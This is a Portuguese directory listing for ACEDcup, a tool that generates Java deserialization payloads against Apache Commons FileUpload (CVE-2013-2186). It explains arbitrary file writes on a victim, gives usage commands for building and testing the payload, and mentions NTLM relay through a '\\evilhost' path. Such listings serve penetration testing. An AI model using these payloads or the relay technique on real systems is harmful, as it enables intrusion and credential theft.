Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
ACEDcup — Gerador de payload para ataque de desserialização binária Java com Commons FileUpload (CVE-2013-2186) | Kitploit
Ferramentas/GitHubGitHub/grrrdog/acedcup
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubgrrrdog/acedcup

ACEDcup

Gerador de payload para ataque de desserialização binária Java com Commons FileUpload (CVE-2013-2186)

Ver Repositório
3714há 10 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

ACEDcup

A ferramenta ACEDcup é um gerador de payload para ataque de desserialização binária Java (ACED)

Para Apache Commons FileUpload ver <= 1.3 (CVE-2013-2186) e Oracle JDK ver < 7u40

O ataque funciona mesmo para versões mais recentes da biblioteca ou do Java. Podemos fazer upload de qualquer conteúdo em qualquer diretório, mas não podemos controlar o nome do arquivo (algo como upload_f71d3547_72ed_4ae1_90fe_0d319115cd42_00000000.tmp) nesta situação. No entanto, pode ser útil em alguns casos.

Também podemos realizar um ataque de NTLM-relay/sniffing (usando \\evilhost\any\path) se seu alvo estiver no Windows.

Uso

root@kitploit:~
  1)Primeiro, criamos um payload serializado:
  java -jar aced_cup.jar /path/payload /path/target /path/out 1
  
  /path/payload - caminho para um arquivo com seu payload
  /path/target - caminho para um arquivo que será criado na sua vítima (será armazenado no payload serializado)
  /path/out - caminho para um arquivo com o payload serializado
  0 - desativa o encerramento com null-byte se você atacar um sistema corrigido (com null-byte por padrão)

  2)Em seguida, definimos o payload serializado para o leitor serializado (se quisermos testar a vulnerabilidade no seu host):
  java -jar ser_reader serialized_payload.txt
  
  ser_reader tenta desserializar o payload e, devido a uma vulnerabilidade em sua biblioteca, cria um novo arquivo no diretório especificado.

Exemplo

java -jar aced_cup.jar D:\\cup_exploit\\payload.txt /home/user/test/any_name.txt D:\\cup_exploit\\serialized_payload.txt

```java -jar ser_reader D:\cup_exploit\serialized_payload.txt````

Baixar ferramenta